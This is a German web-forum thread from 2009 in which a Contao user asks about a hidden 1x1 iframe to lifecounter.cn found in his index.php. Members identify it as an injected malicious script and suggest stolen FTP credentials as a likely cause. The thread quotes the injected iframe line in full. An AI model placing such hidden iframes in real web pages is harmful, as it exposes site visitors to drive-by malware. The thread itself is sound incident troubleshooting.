Ergebnis 1 bis 9 von 9

Thema: Lifecounter.cn-Iframe mit Viruswarnung

  1. #1
    Contao-Nutzer
    Registriert seit
    23.06.2009.
    Beiträge
    30

    Standard Lifecounter.cn-Iframe mit Viruswarnung

    Hallo,

    kann mir jemand sagen, was

    Code:
    <iframe src="http://lifecounter.cn/p/index.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
    aus der index.php bewirkt? Erst einmal wirkt das auf mich "komisch".

    Gruß
    Ludger

  2. #2
    Contao-Fan
    Registriert seit
    31.07.2009.
    Beiträge
    298

    Standard

    Hallo Ludger,

    ich finde diese Codezeile unter http://lifecounter.cn gar nicht.

  3. #3
    Contao-Nutzer
    Registriert seit
    19.07.2009.
    Beiträge
    3

    Standard gehackt?

    also wenn deine Domain nicht gerade lifecounter ist dann würde ich fast behaupten wurdest du gehackt.
    Hatte sowas mal mit nem anderen CMS.

    sehr unfein ... letzteres sauberes Backup einspielen!

  4. #4
    Administratorin Avatar von lucina
    Registriert seit
    19.06.2009.
    Ort
    Kiel (DE)
    Beiträge
    7.335
    Partner-ID
    152
    User beschenken
    Wunschliste
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Kaspersky und andere melden mir bei der referenzierten Seite einen Trojaner:

    04.08.2009 10:36:02 http://lifecounter.cn/p/index.php//index Firefox
    Gefunden: HEUR:Exploit.Script.Generic

    Fragt sich allerdings, wie das in Deine Installation hineinkommt. Wenn das so einfach ist, dann würde mich der Weg auch dringend interessieren.

    Was für ein System fährst Du?

    Carolina.

  5. #5
    Administrator Avatar von Nina
    Registriert seit
    04.06.2009.
    Ort
    Hamburg
    Beiträge
    4.755
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Mein Avira Pro meckert auf der Seite die Malware exp/swf.28992 an.

    Klingt für mich auch nach einem typischen Hack vom Webspace. Gründe dafür gibt es viele:
    • Der ganze Server wurde z. B. aufgrund veralteter darauf laufender Software gehackt (erkennt man daran, wenn andere Webhosting-Kunden auf dem gleichen Server ebenfalls dieses Iframe aufweisen)
    • Dein Webspace wurde gehackt; liegt meist an unsicheren Scripts die sich irgendwo darauf befinden; oft z. B. veraltete oder selbst erstellte Scripte die nicht gegen XSS oder ähnlichen Lücken gesichert sind
    • geklaute FTP-Passwörter (z. B. über Fake-Seitenverlinkungen in Websites)

  6. #6
    sq......
    Gast

    Standard

    hi,

    wenn du eine alte version *filezilla* nutzen solltest, ist das der grund. über ein leck konnten dort die hinterlegten ftp-zugänge ausspioniert werden.

    folgendes wird auf dem account passieren:

    nach und nach wird der unsichtbare iframe mit adlinks von google gefüllt , bis diese dann irgendwann der iframe mal freigestellt wird und deine indexseite damit überspühlt wird. bei klick gibt es dann ganz normal geld von google an die hacker

    lösche den iframe und ändere die ftp-zugangsdaten. befallen sind in der regel nur index-dateien.
    Geändert von sq...... (04.08.2009 um 10:42 Uhr)

  7. #7
    Administratorin Avatar von lucina
    Registriert seit
    19.06.2009.
    Ort
    Kiel (DE)
    Beiträge
    7.335
    Partner-ID
    152
    User beschenken
    Wunschliste
    Contao-Projekt unterstützen

    Support Contao

    Standard Anstatt Rätsel zu raten ...

    ... würde mich persönlich eher interessieren, wie das konkret in diese Installation gekommen ist. Informationen dazu, auf welchem Webserver, mit welcher TL-Version, mit welcher benutzten Software, PHP- & MySQL-Version und in welcher Konfiguration fände ich extrem hilfreich.

    Ich möchte schon wissen, ob das ein individuelles oder ein globales Problem ist. Ein grundsätzliches Problem (sprich: die Möglichkeit, TL-Installationen zu kompromittieren) möchte ich jedenfalls bei geschätzten 30 Kundenseiten nicht an der Backe haben.

    Ludger, kannst Du bitte mal die entsprechenden Informationen posten? Danke!

    Carolina.

  8. #8
    sq......
    Gast

    Standard

    hi lucina,

    das ganze wurde vor einiger zeit schonmal diskutiert und es ist kein problem von TL !!! musste mal im alten forum schauen ... HIER

  9. #9
    Contao-Nutzer
    Registriert seit
    23.06.2009.
    Beiträge
    30

    Standard

    Hallo,

    Zitat Zitat von squidi Beitrag anzeigen
    wenn du eine alte version *filezilla* nutzen solltest, ist das der grund. über ein leck konnten dort die hinterlegten ftp-zugänge ausspioniert werden.
    Wenns mit auch peinlich ist: Das ist dann wohl so. Hab ihn jetzt aktualisiert und die Zugangsdaten geändert. Danke für den Hinweis und die Erläuterungen. Die entsprechende Zeile hatte ich schon auskommentiert.

    Gruß und Danke an alle
    Ludger

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

Ähnliche Themen

  1. iframe einbetten - nur wie
    Von ThomasSchmidt im Forum Layout / Templates / Holy Grail
    Antworten: 2
    Letzter Beitrag: 06.10.2010, 11:14
  2. TL-Shop im iFrame
    Von mibu-ewc im Forum Sonstige Erweiterungen
    Antworten: 2
    Letzter Beitrag: 12.03.2010, 14:57
  3. IFrame
    Von PaSe im Forum Allgemeine Inhaltselemente
    Antworten: 8
    Letzter Beitrag: 30.11.2009, 16:16
  4. Iframe einbinden
    Von Phoenix im Forum Allgemeine Inhaltselemente
    Antworten: 2
    Letzter Beitrag: 22.11.2009, 14:39
  5. Mobile.de iFrame :-(
    Von Askraba im Forum Off Topic
    Antworten: 2
    Letzter Beitrag: 12.10.2009, 09:51

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •